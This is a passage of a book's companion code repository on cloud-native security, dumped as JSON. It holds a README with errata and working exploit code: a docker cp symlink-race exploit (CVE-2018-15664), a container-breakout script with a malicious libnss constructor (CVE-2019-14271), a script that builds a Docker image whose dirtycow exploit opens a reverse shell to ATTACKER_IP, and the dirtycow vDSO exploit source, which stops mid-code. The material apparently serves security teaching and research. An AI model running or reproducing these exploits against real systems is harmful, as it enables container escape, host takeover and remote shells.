[
  {
    "path": "README.md",
    "content": "# 《云原生安全：攻防实践与体系构建》资料仓库\n\n<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/brant-ruan/cloud-native-security-book/main/images/book.jpg\" width = \"250\" height = \"317\" alt=\"\" />\n</p>\n\n本仓库提供了《云原生安全：攻防实践与体系构建》一书的补充材料和随书源码，供感兴趣的读者深入阅读、实践。\n\n**本仓库所有内容仅供教学、研究使用，严禁用于非法用途，违者后果自负！**\n\n相关链接：[豆瓣](https://book.douban.com/subject/35640762/) | [京东](https://item.jd.com/13495676.html) | [当当](http://product.dangdang.com/29318802.html)\n\n## 补充阅读资料\n\n- [100_云计算简介.pdf](appendix/100_云计算简介.pdf)\n- [101_代码安全.pdf](appendix/101_代码安全.pdf)\n- [200_容器技术.pdf](appendix/200_容器技术.pdf)\n- [201_容器编排.pdf](appendix/201_容器编排.pdf)\n- [202_微服务.pdf](appendix/202_微服务.pdf)\n- [203_服务网格.pdf](appendix/203_服务网格.pdf)\n- [204_DevOps.pdf](appendix/204_DevOps.pdf)\n- [CVE-2017-1002101：突破隔离访问宿主机文件系统.pdf](appendix/CVE-2017-1002101：突破隔离访问宿主机文件系统.pdf)\n- [CVE-2018-1002103：远程代码执行与虚拟机逃逸.pdf](appendix/CVE-2018-1002103：远程代码执行与虚拟机逃逸.pdf)\n- [CVE-2020-8595：Istio认证绕过.pdf](appendix/CVE-2020-8595：Istio认证绕过.pdf)\n- [靶机实验：综合场景下的渗透实战.pdf](appendix/靶机实验：综合场景下的渗透实战.pdf)\n\n## 随书源码\n\n|代码目录|描述|定位|\n|:-|:-|:-|\n|[0302-开发侧攻击/02-CVE-2018-15664/symlink_race/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race)| CVE-2018-15664漏洞利用代码|3.2.2小节|\n|[0302-开发侧攻击/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/03-CVE-2019-14271)|CVE-2019-14271漏洞利用代码|3.2.3小节|\n|[0303-供应链攻击/01-CVE-2019-5021-alpine/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-供应链攻击/01-CVE-2019-5021-alpine)|基于存在CVE-2019-5021漏洞的Alpine镜像构建漏洞镜像示例|3.3.1小节|\n|[0303-供应链攻击/02-CVE-2016-5195-malicious-image/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-供应链攻击/02-CVE-2016-5195-malicious-image)|CVE-2016-5195漏洞利用镜像构建示例|3.3.2小节|\n|[0304-运行时攻击/01-容器逃逸/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸)|多个用于容器逃逸的代码片段|3.4.1小节|\n|[0304-运行时攻击/02-安全容器逃逸/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/02-安全容器逃逸)|安全容器逃逸的漏洞利用代码|3.4.2小节|\n|[0304-运行时攻击/03-资源耗尽型攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/03-资源耗尽型攻击)|资源耗尽型攻击示例代码|3.4.3小节|\n|[0402-Kubernetes组件不安全配置/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0402-Kubernetes组件不安全配置/)|K8s不安全配置的利用命令|4.2节|\n|[0403-CVE-2018-1002105/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0403-CVE-2018-1002105)|CVE-2018-1002105漏洞利用代码|4.3节|\n|[0404-K8s拒绝服务攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0404-K8s拒绝服务攻击/)|CVE-2019-11253和CVE-2019-9512的漏洞利用代码|4.4节|\n|[0405-云原生网络攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0405-云原生网络攻击/)|云原生中间人攻击网络环境模拟及攻击代码示例|4.5节|\n\n## 分享与交流\n\n欢迎关注“绿盟科技研究通讯”公众号，我们将持续、高质量地输出信息安全前沿领域研究成果：\n\n![微信搜索“绿盟科技研究通讯”](images/yjtx.png)\n\n## 注意事项\n\n其中部分源码来自网络上其他地方，为方便读者实践，一并归档。这些源码及“摘录出处”为：\n\n1. [0302-开发侧攻击/02-CVE-2018-15664/symlink_race](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race)：https://seclists.org/oss-sec/2019/q2/131\n2. [0302-开发侧攻击/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击)：https://unit42.paloaltonetworks.com/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/\n3. [0304-运行时攻击/01-容器逃逸/CVE-2016-5195/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195)：https://github.com/scumjr/dirtycow-vdso\n4. [0304-运行时攻击/01-容器逃逸/CVE-2019-5736/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸/CVE-2019-5736)：https://github.com/Frichetten/CVE-2019-5736-PoC\n\n引用的项目及代码的许可证（License）以原项目为准。\n\n部分经过笔者修改的源码不再在此列出，书中对相关引用均给出了出处，感兴趣的读者可以参考。\n\n## 勘误及补充说明\n\n### 第1版第3次印刷\n\n#### P56 - 3.4.1 容器逃逸\n\n详见[issue 9](https://github.com/Metarget/cloud-native-security-book/issues/9)。\n\n未来印刷将对原文作以下两处补充和修正：\n\n1. 增加对`#!/proc/self/exe`的必要性的解释（non-dumpable -> dumpable），这里或可提到CVE-2016-9962漏洞。\n2. 在攻击步骤中明确给出上下文，消除“一次runC执行中实现覆盖和shellcode执行”的歧义。\n\n感谢读者[@XDTG](https://github.com/XDTG)指出。我们将在后续的印刷中进行补充和修正。\n\n#### P44 - 3.3.1 镜像漏洞利用\n\n详见[issue 8](https://github.com/Metarget/cloud-native-security-book/issues/8)。\n\n第44页下方用于构建镜像的命令不完整，缺少对构建目录的指定。正确的命令如下（注意最后增加了一个`.`）：\n\n```bash\ndocker build --network=host -t alpine:cve-2019-5021 .\n```\n\n感谢读者[@WAY29](https://github.com/WAY29)指出。我们将在后续的印刷中进行修正。\n\n#### P42 - 3.2.3 CVE-2019-14271：加载不受信任的动态链接库\n\n详见[issue 7](https://github.com/Metarget/cloud-native-security-book/issues/7)。\n\n感谢读者[@WAY29](https://github.com/WAY29)指出。为了成功编译Glibc，需要事先进行configure操作，才能进行make。我们将在后续的印刷中进行修正。\n\n#### P42 - 3.2.3 CVE-2019-14271：加载不受信任的动态链接库\n\n详见[issue 6](https://github.com/Metarget/cloud-native-security-book/issues/6)。\n\n感谢读者[@XDTG](https://github.com/XDTG)指出。书上的步骤在效果上没有问题，但[@XDTG](https://github.com/XDTG)提出的方案更自然优雅。经验证后，我们考虑在后续的印刷中更新方案。\n\n### 第1版第1次印刷\n\n#### P37 - 3.2.2 CVE-2018-15664：符号链接替换漏洞（这里为补充说明，原文并无错误）\n\n正文第八行开始的段落描述较难理解：\n\n> symlink_swap.c的任务是在容器内创建指向根目录“/”的符号链接，并不断地交换符号链接（由命令行参数传入，如“/totally_safe_path”）与一个正常目录（例如“/totally_safe_path-stashed”）的名字。这样一来，在宿主机上执行 docker cp时，如果首先检查到“/totally_safe_path”是一个正常目录，但在后面执行复制操作时“/totally_safe_path”却变成了一个符号链接，那么Docker将在宿主机上解析这个符号链接。\n\n事实上，在容器内部，一旦开始通过renameat2进行名称交换，`/totally_safe_path`和`/totally_safe_path-stashed`实际上对于我们来说只是两个字符串了，不再与符号链接或正常目录绑定，只有停止交换的那一刻，才会重新确定哪个字符串指向哪个（符号链接或目录）。\n\n因此，书中“这样一来，在宿主机上执行docker cp时，如果首先...”这里，这时，容器内已经开始进行名称交换了。用户（或攻击者）想要去docker cp的是容器内名为`/totally_safe_path`的文件或目录（“十分安全的路径”的意思），这是预期（或者说是这个场景的设定）；docker cp在执行过程中，在检查阶段，`/totally_safe_path`路径字符串还指向一个正常目录，但是到了复制操作时，`/totally_safe_path`却已经被交换指向了一个符号链接。\n\n感谢读者@泡泡球麻麻君指出。\n\n#### P85 - 4.2.1 Kubernetes API Server未授权访问（第1版第3次印刷已修复）\n\n正文倒数第四行部分存在歧义：\n\n> 那么攻击者只要网络可达，都能够通过此端口操控集群。\n\n事实上，如果仅仅设置`--insecure-port=8080`，那么服务也只是监听在`localhost`，远程攻击者通常情况下是无法访问的，即使从IP角度来讲是“网络可达的”。如果想要远程操控，还需要配置`--insecure-bind-address=0.0.0.0`才行。\n\n这里的“网络可达”实际上想说明两种情况：\n\n1. 加`--insecure-bind-address`的情况下直接被外部访问，即上面这种；\n2. 能够以某种方式访问到localhost，这个场景又包括：\n    1. 本地用户利用8080端口的服务来提升权限；\n    2. 基于类似SSRF、DNS rebinding的方式来实现远程访问localhost端口。\n"
  },
  {
    "path": "code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/build/Dockerfile",
    "content": "# Copyright (C) 2018 Aleksa Sarai <asarai@suse.de>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program.  If not, see <http://www.gnu.org/licenses/>.\n\n# Build the binary.\nFROM opensuse/leap\nRUN zypper in -y gcc glibc-devel-static\nRUN mkdir /builddir\nCOPY symlink_swap.c /builddir/symlink_swap.c\nRUN gcc -Wall -Werror -static -o /builddir/symlink_swap /builddir/symlink_swap.c\n\n# Set up our malicious rootfs.\nFROM opensuse/leap\nARG SYMSWAP_TARGET=/w00t_w00t_im_a_flag\nARG SYMSWAP_PATH=/totally_safe_path\nRUN echo \"FAILED -- INSIDE CONTAINER PATH\" >\"$SYMSWAP_TARGET\"\nCOPY --from=0 /builddir/symlink_swap /symlink_swap\nENTRYPOINT [\"/symlink_swap\"]\n"
  },
  {
    "path": "code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/build/symlink_swap.c",
    "content": "/*\n * Copyright (C) 2018 Aleksa Sarai <asarai@suse.de>\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or\n * (at your option) any later version.\n *\n * This program is distributed in the hope that it will be useful,\n * but WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n * GNU General Public License for more details.\n *\n * You should have received a copy of the GNU General Public License\n * along with this program.  If not, see <http://www.gnu.org/licenses/>.\n */\n\n#define _GNU_SOURCE\n#include <fcntl.h>\n#include <stdlib.h>\n#include <stdio.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/syscall.h>\n#include <unistd.h>\n\n#define usage() \\\n\tdo { printf(\"usage: symlink_swap <symlink>\\n\"); exit(1); } while(0)\n\n#define bail(msg) \\\n\tdo { perror(\"symlink_swap: \" msg); exit(1); } while (0)\n\n/* No glibc wrapper for this, so wrap it ourselves. */\n#define RENAME_EXCHANGE (1 << 1)\n/*int renameat2(int olddirfd, const char *oldpath,\n              int newdirfd, const char *newpath, int flags)\n{\n\treturn syscall(__NR_renameat2, olddirfd, oldpath, newdirfd, newpath, flags);\n}*/\n\n/* usage: symlink_swap <symlink> */\nint main(int argc, char **argv)\n{\n\tif (argc != 2)\n\t\tusage();\n\n\tchar *symlink_path = argv[1];\n\tchar *stash_path = NULL;\n\tif (asprintf(&stash_path, \"%s-stashed\", symlink_path) < 0)\n\t\tbail(\"create stash_path\");\n\n\t/* Create a dummy file at symlink_path. */\n\tstruct stat sb = {0};\n\tif (!lstat(symlink_path, &sb)) {\n\t\tint err;\n\t\tif (sb.st_mode & S_IFDIR)\n\t\t\terr = rmdir(symlink_path);\n\t\telse\n\t\t\terr = unlink(symlink_path);\n\t\tif (err < 0)\n\t\t\tbail(\"unlink symlink_path\");\n\t}\n\n\t/*\n\t * Now create a symlink to \"/\" (which will resolve to the host's root if we\n\t * win the race) and a dummy directory at stash_path for us to swap with.\n\t * We use a directory to remove the possibility of ENOTDIR which reduces\n\t * the chance of us winning.\n\t */\n\tif (symlink(\"/\", symlink_path) < 0)\n\t\tbail(\"create symlink_path\");\n\tif (mkdir(stash_path, 0755) < 0)\n\t\tbail(\"mkdir stash_path\");\n\n\t/* Now we do a RENAME_EXCHANGE forever. */\n\tfor (;;) {\n\t\tint err = renameat2(AT_FDCWD, symlink_path,\n\t                        AT_FDCWD, stash_path, RENAME_EXCHANGE);\n\t\tif (err < 0)\n\t\t\tperror(\"symlink_swap: rename exchange failed\");\n\t}\n\treturn 0;\n}\n"
  },
  {
    "path": "code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/run_read.sh",
    "content": "#!/bin/zsh\n# Copyright (C) 2018 Aleksa Sarai <asarai@suse.de>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program.  If not, see <http://www.gnu.org/licenses/>.\n\nSYMSWAP_PATH=/totally_safe_path\nSYMSWAP_TARGET=/w00t_w00t_im_a_flag\n\n# Create our flag.\necho \"SUCCESS -- COPIED FROM THE HOST\" | sudo tee \"$SYMSWAP_TARGET\"\nsudo chmod 000 \"$SYMSWAP_TARGET\"\n\n# Run and build the malicious image.\ndocker build -t cyphar/symlink_swap \\\n\t--build-arg \"SYMSWAP_PATH=$SYMSWAP_PATH\" \\\n\t--build-arg \"SYMSWAP_TARGET=$SYMSWAP_TARGET\" build/\nctr_id=$(docker run --rm -d cyphar/symlink_swap \"$SYMSWAP_PATH\")\n\n# Now continually try to copy the files.\nidx=0\nwhile true\ndo\n\tmkdir \"ex${idx}\"\n\tdocker cp \"${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET\" \"ex${idx}/out\"\n\tidx=$(($idx + 1))\ndone\n"
  },
  {
    "path": "code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/run_write.sh",
    "content": "#!/bin/zsh\n# Copyright (C) 2018 Aleksa Sarai <asarai@suse.de>\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program.  If not, see <http://www.gnu.org/licenses/>.\n\nSYMSWAP_PATH=/totally_safe_path\nSYMSWAP_TARGET=/w00t_w00t_im_a_flag\n\n# Create our flag.\necho \"FAILED -- HOST FILE UNCHANGED\" | sudo tee \"$SYMSWAP_TARGET\"\nsudo chmod 0444 \"$SYMSWAP_TARGET\"\n\n# Run and build the malicious image.\ndocker build -t cyphar/symlink_swap \\\n\t--build-arg \"SYMSWAP_PATH=$SYMSWAP_PATH\" \\\n\t--build-arg \"SYMSWAP_TARGET=$SYMSWAP_TARGET\" build/\nctr_id=$(docker run --rm -d cyphar/symlink_swap \"$SYMSWAP_PATH\")\n\necho \"SUCCESS -- HOST FILE CHANGED\" | tee localpath\n\n# Now continually try to copy the files.\nwhile true\ndo\n\tdocker cp localpath \"${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET\"\ndone\n"
  },
  {
    "path": "code/0302-开发侧攻击/03-CVE-2019-14271/breakout",
    "content": "#!/bin/bash\n\numount /host_fs && rm -rf /host_fs\nmkdir /host_fs\n \n \nmount -t proc none /proc     # mount the host's procfs over /proc\ncd /proc/1/root              # chdir to host's root\nmount --bind . /host_fs      # mount host root at /host_fs"
  },
  {
    "path": "code/0302-开发侧攻击/03-CVE-2019-14271/file-service.c",
    "content": "// content should be added into nss/nss_files/files-service.c\n#include <sys/types.h>\n#include <unistd.h>\n#include <stdio.h>\n#include <sys/wait.h>\n\n#define ORIGINAL_LIBNSS \"/original_libnss_files.so.2\"\n#define LIBNSS_PATH \"/lib/x86_64-linux-gnu/libnss_files.so.2\"\n \nbool is_priviliged();\n \n__attribute__ ((constructor)) void run_at_link(void) {\n     char * argv_break[2];\n     if (!is_priviliged())\n           return;\n \n     rename(ORIGINAL_LIBNSS, LIBNSS_PATH);\n \n     if (!fork()) {\n        // Child runs breakout\n        argv_break[0] = strdup(\"/breakout\");\n        argv_break[1] = NULL;\n        execve(\"/breakout\", argv_break, NULL);\n     }\n     else\n        wait(NULL); // Wait for child\n \n     return;\n}\n\nbool is_priviliged() {\n     FILE * proc_file = fopen(\"/proc/self/exe\", \"r\");\n     if (proc_file != NULL) {\n           fclose(proc_file);\n           return false; // can open so /proc exists, not privileged\n     }\n     return true; // we're running in the context of docker-tar\n}"
  },
  {
    "path": "code/0303-供应链攻击/01-CVE-2019-5021-alpine/Dockerfile",
    "content": "FROM alpine:3.5\n\nRUN apk add --no-cache shadow\nRUN adduser -S non_root\n\nUSER non_root"
  },
  {
    "path": "code/0303-供应链攻击/02-CVE-2016-5195-malicious-image/build.sh",
    "content": "#!/bin/bash\n\n# modify ATTACKER_IP and ATTACKER_PORT before building\nATTACKER_IP=REVERSE_SHELL_IP\nATTACKER_PORT=REVERSE_SHELL_PORT\n\nTEMP_DIR=./temp-dirtycow\n\nset -e -x\n\n# build ExP\nsudo apt update && sudo apt install -y build-essential nasm\nmkdir -p $TEMP_DIR\ngit clone https://github.com/scumjr/dirtycow-vdso.git $TEMP_DIR\ncd $TEMP_DIR\nmake\ncd ..\n\n# build malicious image\ncat << EOF > ./Dockerfile\nFROM ubuntu:18.04\n\nADD $TEMP_DIR/0xdeadbeef /entrypoint\nRUN chmod u+x /entrypoint\nENTRYPOINT [\"/entrypoint\", \"$ATTACKER_IP:$ATTACKER_PORT\"]\nEOF\n\nsudo docker build -t cve-2016-5195:v1.0 .\n\nrm ./Dockerfile\nrm -rf $TEMP_DIR"
  },
  {
    "path": "code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/0xdeadbeef.c",
    "content": "/*\n * CVE-2016-5195 POC\n * -scumjr\n */\n\n#define _GNU_SOURCE\n#include <err.h>\n#include <poll.h>\n#include <errno.h>\n#include <sched.h>\n#include <stdio.h>\n#include <fcntl.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <pthread.h>\n#include <stdbool.h>\n#include <sys/auxv.h>\n#include <sys/mman.h>\n#include <sys/user.h>\n#include <sys/wait.h>\n#include <sys/types.h>\n#include <sys/prctl.h>\n#include <arpa/inet.h>\n#include <sys/ptrace.h>\n#include <sys/socket.h>\n\n#include \"payload.h\"\n\n#ifndef PAGE_SIZE\n#define PAGE_SIZE 4096\n#endif\n\n#define PATTERN_IP\t\t\"\\xde\\xc0\\xad\\xde\"\n#define PATTERN_PORT\t\t\"\\x37\\x13\"\n#define PATTERN_PROLOGUE\t\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\n#define PAYLOAD_IP\t\tINADDR_LOOPBACK\n#define PAYLOAD_PORT\t\t1234\n\n#define LOOP\t\t\t0x10000\n#define VDSO_SIZE\t\t(2 * PAGE_SIZE)\n#define ARRAY_SIZE(arr)\t\t(sizeof(arr) / sizeof(arr[0]))\n\ntypedef unsigned int uint32_t;\ntypedef unsigned long uint64_t;\n\nstruct vdso_patch {\n\tunsigned char *patch;\n\tunsigned char *copy;\n\tsize_t size;\n\tvoid *addr;\n};\n\nstruct payload_patch {\n\tconst char *name;\n\tvoid *pattern;\n\tsize_t pattern_size;\n\tvoid *buf;\n\tsize_t size;\n};\n\nstruct prologue {\n\tchar *opcodes;\n\tsize_t size;\n};\n\nstruct mem_arg  {\n\tvoid *vdso_addr;\n\tbool do_patch;\n\tbool stop;\n\tunsigned int patch_number;\n};\n\nstatic char child_stack[8192];\nstatic struct vdso_patch vdso_patch[2];\n\nstatic struct prologue prologues[] = {\n\t/* push rbp; mov rbp, rsp; lfence */\n\t{ \"\\x55\\x48\\x89\\xe5\\x0f\\xae\\xe8\", 7 },\n\t/* push rbp; mov rbp, rsp; push r14 */\n\t{ \"\\x55\\x48\\x89\\xe5\\x41\\x57\", 6 },\n\t/* push rbp; mov rbp, rdi; push rbx */\n\t{ \"\\x55\\x48\\x89\\xfd\\x53\", 5 },\n\t/* push rbp; mov rbp, rsp; xchg rax, rax */\n\t{ \"\\x55\\x48\\x89\\xe5\\x66\\x66\\x90\", 7 },\n\t/* push rbp; cmp edi, 1; mov rbp, rsp */\n\t{ \"\\x55\\x83\\xff\\x01\\x48\\x89\\xe5\", 7 },\n};\n\nstatic int writeall(int fd, const void *buf, size_t count)\n{\n\tconst char *p;\n\tssize_t i;\n\n\tp = buf;\n\tdo {\n\t\ti = write(fd, p, count);\n\t\tif (i == 0) {\n\t\t\treturn -1;\n\t\t} else if (i == -1) {\n\t\t\tif (errno == EINTR)\n\t\t\t\tcontinue;\n\t\t\treturn -1;\n\t\t}\n\t\tcount -= i;\n\t\tp += i;\n\t} while (count > 0);\n\n\treturn 0;\n}\n\nstatic void *get_vdso_addr(void)\n{\n\treturn (void *)getauxval(AT_SYSINFO_EHDR);\n}\n\nstatic int ptrace_memcpy(pid_t pid, void *dest, const void *src, size_t n)\n{\n\tconst unsigned char *s;\n\tunsigned long value;\n\tunsigned char *d;\n\n\td = dest;\n\ts = src;\n\n\twhile (n >= sizeof(long)) {\n\t\tmemcpy(&value, s, sizeof(value));\n\t\tif (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) {\n\t\t\twarn(\"ptrace(PTRACE_POKETEXT)\");\n\t\t\treturn -1;\n\t\t}\n\n\t\tn -= sizeof(long);\n\t\td += sizeof(long);\n\t\ts += sizeof(long);\n\t}\n\n\tif (n > 0) {\n\t\td -= sizeof(long) - n;\n\n\t\terrno = 0;\n\t\tvalue = ptrace(PTRACE_PEEKTEXT, pid, d, NULL);\n\t\tif (value == -1 && errno != 0) {\n\t\t\twarn(\"ptrace(PTRACE_PEEKTEXT)\");\n\t\t\treturn -1;\n\t\t}\n\n\t\tmemcpy((unsigned char *)&value + sizeof(value) - n, s, n);\n\t\tif (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) {\n\t\t\twarn(\"ptrace(PTRACE_POKETEXT)\");\n\t\t\treturn -1;\n\t\t}\n\t}\n\n\treturn 0;\n}\n\nstatic int patch_payload_helper(struct payload_patch *pp)\n{\n\tunsigned char *p;\n\n\tp = memmem(payload, payload_len, pp->pattern, pp->pattern_size);\n\tif (p == NULL) {\n\t\tfprintf(stderr, \"[-] failed to patch payload's %s\\n\", pp->name);\n\t\treturn -1;\n\t}\n\n\tmemcpy(p, pp->buf, pp->size);\n\n\tp = memmem(payload, payload_len, pp->pattern, pp->pattern_size);\n\tif (p != NULL) {\n\t\tfprintf(stderr,\n\t\t\t\"[-] payload's %s pattern was found several times\\n\",\n\t\t\tpp->name);\n\t\treturn -1;\n\t}\n\n\treturn 0;\n}\n\n/*\n * A few bytes of the payload must be patched: prologue, ip, and port.\n */\nstatic int patch_payload(struct prologue *p, uint32_t ip, uint16_t port)\n{\n\tint i;\n\n\tstruct payload_patch payload_patch[] = {\n\t\t{ \"port\", PATTERN_PORT, sizeof(PATTERN_PORT)-1, &port, sizeof(port) },\n\t\t{ \"ip\", PATTERN_IP, sizeof(PATTERN_IP)-1, &ip, sizeof(ip) },\n\t\t{ \"prologue\", PATTERN_PROLOGUE, sizeof(PATTERN_PROLOGUE)-1, p->opcodes, p->size },\n\t};\n\n\tfor (i = 0; i < ARRAY_SIZE(payload_patch); i++) {\n\t\tif (patch_payload_helper(&payload_patch[i]) == -1)\n\t\t\treturn -1;\n\t}\n\n\treturn 0;\n}\n\n/* make a copy of vDSO to restore it later */\nstatic int save_orig_vdso(void)\n{\n\tstruct vdso_patch *p;\n\tint i;\n\n\tfor (i = 0; i < ARRAY_SIZE(vdso_patch); i++) {\n\t\tp = &vdso_patch[i];\n\t\tp->copy = malloc(p->size);\n\t\tif (p->copy == NULL) {\n\t\t\twarn(\"malloc\");\n\t\t\treturn -1;\n\t\t}\n\n\t\tmemcpy(p->copy, p->addr, p->size);\n\t}\n\n\treturn 0;\n}\n\nstatic int build_vdso_patch(void *vdso_addr, struct prologue *prologue)\n{\n\tuint32_t clock_gettime_offset, target;\n\tunsigned long clock_gettime_addr;\n\tunsigned char *p, *buf;\n\tuint64_t entry_point;\n\tint i;\n\n\t/* e_entry */\n\tp = vdso_addr;\n\tentry_point = *(uint64_t *)(p + 0x18);\n\tclock_gettime_offset = (uint32_t)entry_point & 0xfff;\n\tclock_gettime_addr = (unsigned long)vdso_addr + clock_gettime_offset;\n\n\t/* patch #1: put payload at the end of vdso */\n\tvdso_patch[0].patch = payload;\n\tvdso_patch[0].size = payload_len;\n\tvdso_patch[0].addr = (unsigned char *)vdso_addr + VDSO_SIZE - payload_len;\n\n\tp = vdso_patch[0].addr;\n\tfor (i = 0; i < payload_len; i++) {\n\t\tif (p[i] != '\\x00') {\n\t\t\tfprintf(stderr, \"failed to find a place for the payload\\n\");\n\t\t\treturn -1;\n\t\t}\n\t}\n\n\t/* patch #2: hijack clock_gettime prologue */\n\tbuf = malloc(sizeof(PATTERN_PROLOGUE)-1);\n\tif (buf == NULL) {\n\t\twarn(\"malloc\");\n\t\treturn -1;\n\t}\n\n\t/* craft call to payload */\n\ttarget = VDSO_SIZE - payload_len - clock_gettime_offset;\n\tmemset(buf, '\\x90', sizeof(PATTERN_PROLOGUE)-1);\n\tbuf[0] = '\\xe8';\n\t*(uint32_t *)&buf[1] = target - 5;\n\n\tvdso_patch[1].patch = buf;\n\tvdso_patch[1].size = prologue->size;\n\tvdso_patch[1].addr = (unsigned char *)clock_gettime_addr;\n\n\tsave_orig_vdso();\n\n\treturn 0;\n}\n\nstatic int backdoor_vdso(pid_t pid, unsigned int patch_number)\n{\n\tstruct vdso_patch *p;\n\n\tp = &vdso_patch[patch_number];\n\treturn ptrace_memcpy(pid, p->addr, p->patch, p->size);\n}\n\nstatic int restore_vdso(pid_t pid, unsigned int patch_number)\n{\n\tstruct vdso_patch *p;\n\n\tp = &vdso_patch[patch_number];\n\treturn ptrace_memcpy(pid, p->addr, p->copy, p->size);\n}\n\n/*\n * Check if vDSO is entirely patched. This function is executed in a different\n * memory space thanks to fork(). Return 0 on success, 1 otherwise.\n */\nstatic void check(struct mem_arg *arg)\n{\n\tstruct vdso_patch *p;\n\tvoid *src;\n\tint i, ret;\n\n\tp = &vdso_patch[arg->patch_number];\n\tsrc = arg->do_patch ? p->patch : p->copy;\n\n\tret = 1;\n\tfor (i = 0; i < LOOP; i++) {\n\t\tif (memcmp(p->addr, src, p->size) == 0) {\n\t\t\tret = 0;\n\t\t\tbreak;\n\t\t}\n\n\t\tusleep(100);\n\t}\n\n\texit(ret);\n}\n\nstatic void *madviseThread(void *arg_)\n{\n\tstruct mem_arg *arg;\n\n\targ = (struct mem_arg *)arg_;\n\twhile (!arg->stop) {\n\t\tif (madvise(arg->vdso_addr, VDSO_SIZE, MADV_DONTNEED) == -1) {\n\t\t\twarn(\"madvise\");\n\t\t\tbreak;\n\t\t}\n\t}\n\n\treturn NULL;\n}\n\nstatic int debuggee(void *arg_)\n{\n\tif (prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0) == -1)\n\t\terr(1, \"prctl(PR_SET_PDEATHSIG)\");\n\n\tif (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)\n\t\terr(1, \"ptrace(PTRACE_TRACEME)\");\n\n\tkill(getpid(), SIGSTOP);\n\n\treturn 0;\n}\n\n/* use ptrace to write to read-only mappings */\nstatic void *ptrace_thread(void *arg_)\n{\n\tint flags, ret2, status;\n\tstruct mem_arg *arg;\n\tpid_t pid;\n\tvoid *ret;\n\n\targ = (struct mem_arg *)arg_;\n\n\tflags = CLONE_VM|CLONE_PTRACE;\n\tpid = clone(debuggee, child_stack + sizeof(child_stack) - 8, flags, arg);\n\tif (pid == -1) {\n\t\twarn(\"clone\");\n\t\treturn NULL;\n\t}\n\n\tif (waitpid(pid, &status, __WALL) == -1) {\n\t\twarn(\"waitpid\");\n\t\treturn NULL;\n\t}\n\n\tret = NULL;\n\twhile (!arg->stop) {\n\t\tif (arg->do_patch)\n\t\t\tret2 = backdoor_vdso(pid, arg->patch_number);\n\t\telse\n\t\t\tret2 = restore_vdso(pid, arg->patch_number);\n\n\t\tif (ret2 == -1) {\n\t\t\tret = NULL;\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (ptrace(PTRACE_CONT, pid, NULL, NULL) == -1)\n\t\twarn(\"ptrace(PTRACE_CONT)\");\n\n\tif (waitpid(pid, NULL, __WALL) == -1)\n\t\twarn(\"waitpid\");\n\n\treturn ret;\n}\n\nstatic int exploit_helper(struct mem_arg *arg)\n{\n\tpthread_t pth1, pth2;\n\tint ret, status;\n\tpid_t pid;\n\n\tfprintf(stderr, \"[*] %s: patch %d/%ld\\n\",\n\t\targ->do_patch ? \"exploit\" : \"restore\",\n\t\targ->patch_number + 